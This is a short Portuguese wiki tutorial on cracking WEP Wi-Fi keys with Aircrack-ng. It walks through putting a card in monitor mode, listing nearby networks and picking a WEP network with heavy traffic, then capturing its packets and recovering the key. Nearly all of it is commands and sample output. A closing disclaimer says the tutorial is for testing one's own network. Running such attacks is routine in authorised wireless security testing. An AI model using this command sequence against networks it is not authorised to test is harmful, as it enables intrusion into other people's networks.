Aircrack - Tutorial WEP

De Pontão Nós Digitais
Revisão de 18h25min de 2 de maio de 2015 por Felipecabral (discussão | contribs)
(dif) ← Edição anterior | Revisão atual (dif) | Versão posterior → (dif)
Ir para navegaçãoIr para pesquisar

A partir daqui, consideramos que você já tenha um sistema com Aircrack-ng instalado e em funcionamento!

Instruções

Primeiro, vamos colocar nossa placa de wifi (wlan0) para monitorar (mon0):

   airmon-ng start wlan0

Vamos ver quais redes existem por perto:

   airodump-ng mon0

Um exemplo de saída:

   CH  7 ][ BAT: 1 hour 19 mins ][ Elapsed: 48 s ][ 2012-03-05 17:37                                         
                                                                                                                                                
    BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                              
                                                                                                                                                
    00:12:0E:A1:56:04   -1        0      101    0  32  -1   WPA              <length:  0>                                                       
    D8:5D:4C:AC:45:02  -88       23        0    0   1  54 . WPA2 CCMP   PSK  Bete                                                              
    00:1D:0F:D1:E5:A2  -88       33        0    0  11  54 . WEP  WEP         Claudio                                                       
    00:11:22:33:44:55  -88      106     1069    0   6  54 . WEP  WEP         FooBar                                                           
    6C:FD:B9:29:19:84  -88       52        2    0   1  54e. WPA2 CCMP   PSK  Lalala                                                           
    00:24:01:6E:F4:35  -88       31        2    0  11  54 . WEP  WEP         Xum                                                               
    00:13:46:F0:EE:C8  -88        2        0    0   6  54 . WPA  TKIP   PSK  Bzzz                                                               

Escolha uma com grande número de pacotes/segunds e com segurança WEP. No caso, escolhi FooBar. Anote o canal (6), o BSSID (00:11:22:33:44:55) e o ESSID (FooBar), vamos precisar disso.

Comece a capturar pacotes e gravá-los em um arquivo de log:

   airodump-ng --channel 6 --bssid 00:11:22:33:44:55 -w arquivo_log mon0

Deixe um bom tempo esse comando rodando, para capturar o máximo de pacotes possível. Acima de uns 20 mil já está legal, pode tentar o comando abaixo:

   aircrack-ng -b 00:11:22:33:44:55 arquivo_log*.cap

Se o aircrack conseguiu quebrar, ótimo. Senão, tente o comando para captura de pacotes até obter um número suficiente, até conseguir quebrar a chave.

      • NAO NOS RESPONSABILIZAMOS PELO MAL USO DESSE TUTORIAL. ESTÁ AQUI PARA VOCÊ USAR PARA TESTAR SUA PRÓPRIA REDE WEP. ***